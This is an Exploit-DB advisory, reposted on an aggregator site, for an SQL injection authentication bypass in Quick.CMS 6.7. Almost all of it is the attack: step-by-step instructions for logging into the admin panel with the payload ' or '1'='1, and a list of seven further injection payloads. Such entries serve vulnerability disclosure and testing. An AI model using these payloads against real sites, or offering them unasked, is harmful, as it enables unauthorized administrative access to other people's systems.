[webapps] Quick.CMS 6.7 - SQL Injection Login Bypass
2024-3-18 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
2024-3-18 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
# Google Dork: N/A
# Date: 02-03-2024
# Exploit Author: ./H4X.Forensics - Diyar
# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
# Version: 6.7
# Tested on: Windows
# CVE : N/A
How to exploit :
*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
*--> Enter any Email like : [email protected]<mailto:[email protected]>
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Tick the Checkbox
*--> Press Login
*--> Congratz!
*--> SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Payloads Can be use :
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
文章来源: https://www.exploit-db.com/exploits/51910
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh